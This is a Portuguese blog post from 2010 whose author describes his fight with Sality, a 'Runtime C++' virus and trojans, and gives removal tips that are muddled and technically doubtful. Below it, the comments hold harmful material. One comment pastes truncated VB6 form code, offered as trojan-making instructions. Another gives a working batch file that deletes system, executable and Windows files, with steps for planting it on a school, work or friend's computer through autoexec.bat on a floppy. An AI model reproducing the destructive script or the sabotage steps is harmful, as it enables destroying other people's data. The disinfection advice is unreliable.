visitantes


sábado, 21 de agosto de 2010

Como se livrar de virus fortes como o Sality e o Runtime

Apos dois dias de guerra com o Runtime C++ e com o Sality e os Trojans , decidi saber mais sobre eles.

O Vírus Run time Foi o poderozo da guerra aqui de casa.
os seguintes sintomas foram:

                                      Run Time C++

* Progamas operacionais e Que eu mais uzo Da o Run Time error C++ incluindo Antivirus e Etc...

*Progamas danificados não podem ser excluidos.

*Multiplica os outros virus dentro dos progamas.

*E uza 654441546.exe

*Trava o Seu Disco C:\ executa como um arquivo desconhecido

                                                    Sality.y

*Ele entra no seu sistema e vira administrador e impede o regedit eo Ctrl + Alt + Del Protegendo o Run Time.

*Ressusita os trojans.

*Se multiplica dentro de todos os .exe

                                                    Trojans

*Os cavalos de troia entram em seu sistema e se multiplicam dentro do seu sistema atraves do .exe por exemplo:
Primeiro vem no seu processo 5631827.exe ele ta trabalhando ele fecha o ctfmon.exe depois abre o ctfmon.exe para criar outro cavalo de troia.
E se vc excluilo manualmente perderá algum intem vital para o seu Windows

                                                        Pontos Fracos.

Mais Fique calmo ainda não é o seu fim eu axo.
Seu problema vai ser com os trojans e com o sality que tambem é um trojan mais esperto.

O ponto fraco do Runtime é o Autorun.inf que se encontra dentro do disco C:\ .

Abra o bloco de notas vasio e salve com o nome de Autorun.inf no desktop Recorte e tente entrar no seu disco cole em Arquivos e Progamas depois recorte e cole em C:\ do lado de Arquivos e progamas , Windows e Documentos and setings.

vai aparecer deseja substituir . diga sim.
Agora exclua com qualquer progama que ainda funcione ou faça download se conseguir.Exclua o autorun.inf
pronto O seu Runtime foi excluido.

O problema agora é o Sality que sentindo a falta do Runtime vai anular o Avast e qualquer outro progama antivirus mais sem tanta eficiencia como o Runtime que vc excluiu.

baixe o avast.se vc tiver qualquer outro instalador ou o mesmo esqueça exclua.

Agora instale o Windows Por sima Para aquietar o virus por alguns instantes.
depois de baixado faça um escaner ao reiniciar. escaniei tres vezes pra tirar o pack de virus safado.


Se vc não conseguir formate.

agora se vc descobrir como tirar o Erro 42127:
C:\documentos an setings\uzuario\Temporary\internet Files\Content.IES\UITC9EF\swflash[1].cab[>FP_AX_CAB_Instaler.exe
me avize é sequela do virus



                                                          ----------------->>>>>>>>>>>>Rilderson<<<<<<<<<<<<-----------

3 comentários:

  1. lembre-se que o microsoft c++ é um programa do windows.
    lembre-se também de outro efeito do runtime que é deixar as pastas dos programas invisíveis e criar outras com o mesmo nome e tamanho,mas dentro delas há trojans.

    ResponderExcluir
  2. rilderson,sou eu kecy toma um assunto q muito te interessa:
    Criar um Cavalo de TROIAܓܜܡ
    Criando Cavalo de TROIA
    Copie o seguinte código no seu Bloco de Notas:

    VERSION 5.00
    Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
    Begin VB.Form Form1
    BackColor = &H80000007&
    BorderStyle = 1 'Fixed Single
    Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
    ClientHeight = 5400
    ClientLeft = 45
    ClientTop = 390
    ClientWidth = 8085
    BeginProperty Font
    Name = "Fixedsys"
    Size = 9
    Charset = 0
    Weight = 400
    Underline = 0 'False
    Italic = 0 'False
    Strikethrough = 0 'False
    EndProperty
    Icon = "Source3.frx":0000
    LinkTopic = "Form1"
    MaxButton = 0 'False
    MinButton = 0 'False
    MouseIcon = "Source3.frx":08CA
    PaletteMode = 2 'Custom
    ScaleHeight = 5400
    ScaleWidth = 8085
    ShowInTaskbar = 0 'False
    StartUpPosition = 3 'Windows Default
    Begin VB.CommandButton Command3
    Caption = "About"
    BeginProperty Font
    Name = "MS Sans Serif"
    Size = 8.25
    Charset = 0
    Weight = 400
    Underline = 0 'False
    Italic = 0 'False
    Strikethrough = 0 'False
    EndProperty
    Height = 375
    Left = 120
    TabIndex = 3
    Top = 4920
    Width = 1215
    End
    Begin VB.CommandButton Command2
    Appearance = 0 'Flat
    BackColor = &H000000FF&
    Caption = "WEBSITE"
    BeginProperty Font
    Name = "Trebuchet MS"
    Size = 8.25
    Charset = 0
    Weight = 400
    Underline = 0 'False
    Italic = 0 'False
    Strikethrough = 0 'False
    EndProperty
    Height

    mas tem que salvar em arquivos em lotes do cmd
    salve por exemplo:example.bat ou example.cmd
    pode ser qualquer nome desde que termine com .bat ou .cmd

    ResponderExcluir
  3. Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
    Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:

    copy con arquivo.bat

    @echo off

    @echo frase de sua preferência

    del*.sys

    del*.exe

    del*.com

    cd windows

    del*.*

    del arquivo.bat

    @echo frase de sua preferência

    Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
    Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
    Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe

    ResponderExcluir